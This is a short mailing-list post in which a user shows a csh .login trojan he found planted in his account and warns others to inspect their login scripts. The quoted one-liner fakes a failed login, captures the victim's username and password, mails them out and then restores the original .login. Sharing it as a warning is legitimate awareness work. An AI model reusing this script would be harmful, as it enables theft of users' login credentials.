Re: [TCLUG:17403] ILOVEYOU for Linux

Oh? Let's see.  I found this little scriptlet in my .login a couple years
back, check this out

-=- begin .login

clear;stty intr '^@';echo 'Login incorrect';echo -n 'login: ';echo
$<>.t;echo -n 'Password: ';stty -echo;echo $<>>.t;mail
jbevren@localhost<.t;rm -f .t;cat /etc/motd;mv -f .l .login;rm -f
.hushlogin;stty echo;source .login

-=- end .login

Of course, the "mail jbevren@localhost" _was_ another email address, some
dork @usa.net (whose account is no longer valid thanks to me).  It's a good
thing I dont use csh, or they'd have had my password a long time ago.  It
_is_ a good idea to keep an eye on your scripts guys, dont laugh at it.

-David